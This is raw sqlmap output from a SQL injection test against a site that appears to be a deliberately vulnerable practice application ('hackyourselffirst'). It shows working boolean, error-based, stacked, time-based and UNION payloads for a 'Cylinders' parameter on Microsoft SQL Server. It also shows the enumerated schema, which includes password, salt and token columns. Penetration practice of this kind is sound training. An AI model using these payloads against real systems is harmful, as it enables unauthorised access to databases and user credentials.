sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests: --- Parameter: Cylinders (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Cylinders=V8' AND 3245=3245 AND 'lHyI'='lHyI Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) Payload: Cylinders=V8' AND 6164 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6164=6164) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'wvaX'='wvaX Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Cylinders=V8';WAITFOR DELAY '0:0:5'-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF - comment) Payload: Cylinders=V8' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: Cylinders=V8' UNION ALL SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(73)+CHAR(114)+CHAR(105)+CHAR(83)+CHAR(109)+CHAR(108)+CHAR(111)+CHAR(90)+CHAR(80)+CHAR(102)+CHAR(112)+CHAR(90)+CHAR(84)+CHAR(118)+CHAR(99)+CHAR(84)+CHAR(99)+CHAR(112)+CHAR(88)+CHAR(108)+CHAR(78)+CHAR(109)+CHAR(112)+CHAR(72)+CHAR(66)+CHAR(83)+CHAR(118)+CHAR(105)+CHAR(67)+CHAR(109)+CHAR(82)+CHAR(108)+CHAR(118)+CHAR(119)+CHAR(106)+CHAR(81)+CHAR(109)+CHAR(99)+CHAR(111)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113),NULL-- ZZPn --- web server operating system: Windows web application technology: ASP.NET 4.0.30319, ASP.NET back-end DBMS operating system: Windows back-end DBMS: Microsoft SQL Server Azure banner: --- Microsoft SQL Azure (RTM) - 12.0.2000.8 May 12 2022 23:11:24 Copyright (C) 2022 Microsoft Corporation --- current user: 'HackYourselfFirstRestricted' current database: 'hackyourselffirst_db' current user is DBA: False sqlmap resumed the following injection point(s) from stored session: --- Parameter: Cylinders (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Cylinders=V8' AND 3245=3245 AND 'lHyI'='lHyI Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) Payload: Cylinders=V8' AND 6164 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6164=6164) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'wvaX'='wvaX Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Cylinders=V8';WAITFOR DELAY '0:0:5'-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF - comment) Payload: Cylinders=V8' WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: Cylinders=V8' UNION ALL SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(73)+CHAR(114)+CHAR(105)+CHAR(83)+CHAR(109)+CHAR(108)+CHAR(111)+CHAR(90)+CHAR(80)+CHAR(102)+CHAR(112)+CHAR(90)+CHAR(84)+CHAR(118)+CHAR(99)+CHAR(84)+CHAR(99)+CHAR(112)+CHAR(88)+CHAR(108)+CHAR(78)+CHAR(109)+CHAR(112)+CHAR(72)+CHAR(66)+CHAR(83)+CHAR(118)+CHAR(105)+CHAR(67)+CHAR(109)+CHAR(82)+CHAR(108)+CHAR(118)+CHAR(119)+CHAR(106)+CHAR(81)+CHAR(109)+CHAR(99)+CHAR(111)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113),NULL-- ZZPn --- web server operating system: Windows web application technology: ASP.NET, ASP.NET 4.0.30319 back-end DBMS: Microsoft SQL Server azure Database: tempdb Table: #dm_hadr_database_replica_states____________________________________________________________________________________0000000024CA [38 columns] +-----------------------------+------------------+ | Column | Type | +-----------------------------+------------------+ | database_id | int | | database_state_desc | nvarchar | | end_of_log_lsn | varchar | | filestream_send_rate | bigint | | group_database_id | uniqueidentifier | | group_id | uniqueidentifier | | internal_state_desc | nvarchar | | is_commit_participant | bit | | is_forwarder | int | | is_local | bit | | is_primary_replica | bit | | is_seeding_in_progress | int | | is_suspended | bit | | last_commit_lsn | varchar | | last_commit_time | datetime | | last_hardened_lsn | varchar | | last_hardened_time | datetime | | last_received_lsn | varchar | | last_received_time | datetime | | last_redone_lsn | varchar | | last_redone_time | datetime | | last_sent_lsn | varchar | | last_sent_time | datetime | | log_send_queue_size | bigint | | log_send_rate | bigint | | logical_database_name | nvarchar | | low_water_mark_for_ghosts | bigint | | quorum_commit_lsn | varchar | | quorum_commit_time | datetime | | recovery_lsn | varchar | | redo_queue_size | bigint | | redo_rate | bigint | | replica_id | uniqueidentifier | | secondary_lag_seconds | bigint | | suspend_reason_desc | nvarchar | | synchronization_health_desc | nvarchar | | synchronization_state_desc | nvarchar | | truncation_lsn | varchar | +-----------------------------+------------------+ Database: hackyourselffirst_db Table: Make [2 columns] +--------+----------+ | Column | Type | +--------+----------+ | MakeId | int | | Name | nvarchar | +--------+----------+ Database: hackyourselffirst_db Table: Supercar [12 columns] +--------------------------+----------+ | Column | Type | +--------------------------+----------+ | Cylinders | nvarchar | | Description | nvarchar | | EngineCc | int | | EngineLayout | nvarchar | | MakeId | int | | Model | nvarchar | | PowerKw | int | | SupercarId | int | | TopSpeedKm | int | | TorqueNm | int | | WeightKg | int | | ZeroToOneHundredKmInSecs | float | +--------------------------+----------+ Database: hackyourselffirst_db Table: UserProfile [6 columns] +-----------+----------+ | Column | Type | +-----------+----------+ | Email | nvarchar | | FirstName | nvarchar | | IsAdmin | bit | | LastName | nvarchar | | Password | nvarchar | | UserId | int | +-----------+----------+ Database: hackyourselffirst_db Table: Vote [4 columns] +------------+----------+ | Column | Type | +------------+----------+ | Comments | nvarchar | | SupercarId | int | | UserId | int | | VoteId | int | +------------+----------+ Database: hackyourselffirst_db Table: webpages_Membership [11 columns] +-----------------------------------------+----------+ | Column | Type | +-----------------------------------------+----------+ | ConfirmationToken | nvarchar | | CreateDate | datetime | | IsConfirmed | bit | | LastPasswordFailureDate | datetime | | Password | nvarchar | | PasswordChangedDate | datetime | | PasswordFailuresSinceLastSuccess | int | | PasswordSalt | nvarchar | | PasswordVerificationToken | nvarchar | | PasswordVerificationTokenExpirationDate | datetime | | UserId | int | +-----------------------------------------+----------+ Database: hackyourselffirst_db Table: webpages_OAuthMembership [3 columns] +----------------+----------+ | Column | Type | +----------------+----------+ | Provider | nvarchar | | ProviderUserId | nvarchar | | UserId | int | +----------------+----------+ Database: hackyourselffirst_db Table: webpages_Roles [2 columns] +----------+----------+ | Column | Type | +----------+----------+ | RoleId | int | | RoleName | nvarchar | +----------+----------+ Database: hackyourselffirst_db Table: webpages_UsersInRoles [2 columns] +--------+------+ | Column | Type | +--------+------+ | RoleId | int | | UserId | int | +--------+------+ Database: hackyourselffirst_db Table: sys.database_firewall_rules [6 columns] +------------------+----------+ | Column | Type | +------------------+----------+ | create_date | datetime | | end_ip_address | varchar | | id | int | | modify_date | datetime | | name | nvarchar | | start_ip_address | varchar | +------------------+----------+ Database: hackyourselffirst_db Table: sys.script_deployment_status [9 columns] +------------------+------------------+ | Column | Type | +------------------+------------------+ | database_name | nvarchar | | deployment_end | datetimeoffset | | deployment_id | uniqueidentifier | | deployment_start | datetimeoffset | | logical_server | nvarchar | | messages | nvarchar | | num_retries | smallint | | status | nvarchar | | worker_id | uniqueidentifier | +------------------+------------------+ Database: hackyourselffirst_db Table: sys.script_deployments [11 columns] +----------------------+------------------+ | Column | Type | +----------------------+------------------+ | coordinator_id | uniqueidentifier | | deployment_end | datetimeoffset | | deployment_id | uniqueidentifier | | deployment_name | nvarchar | | deployment_start | datetimeoffset | | deployment_submitted | datetimeoffset | | messages | nvarchar | | results_table | nvarchar | | retry_policy | nvarchar | | script | nvarchar | | status | nvarchar | +----------------------+------------------+